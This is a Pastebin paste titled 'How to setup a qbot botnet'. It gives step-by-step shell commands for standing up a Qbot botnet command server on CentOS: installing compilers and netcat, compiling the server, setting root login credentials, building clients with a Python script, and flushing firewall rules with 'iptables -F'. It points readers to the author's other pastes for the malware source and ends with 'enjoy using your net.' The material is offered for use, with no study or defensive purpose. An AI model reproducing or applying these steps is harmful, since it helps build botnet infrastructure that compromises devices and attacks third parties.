NotHarmless

How to setup a qbot botnet

May 14th, 2018
2,159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. ------------------------
  2. * Net setup tutorial *
  3. * by @dump_ips *
  4. *----------------------
  5.  
  6. Type: sudo yum update -y
  7. Type: yum install python python-paramiko gcc nano wget nc screen psmisc bzip2 -y
  8. Type: gcc example.c -o server -pthread
  9. Type: echo root root>login.txt (For some serversides it's different just open up your serverside then check)
  10. Type: python cc7.py enter your client name enter your ip to the server
  11. Type: iptables -F
  12. Type: screen ./server 35 1 420 whatever port you wanna enter
  13.  
  14. You will need a cent os 6 server 4Gig max for qbots
  15. serverside
  16. client
  17. compiler
  18.  
  19. all can be found on my pastebin :):):)
  20. enjoy using your net.
Advertisement
Add Comment
Please, Sign In to add comment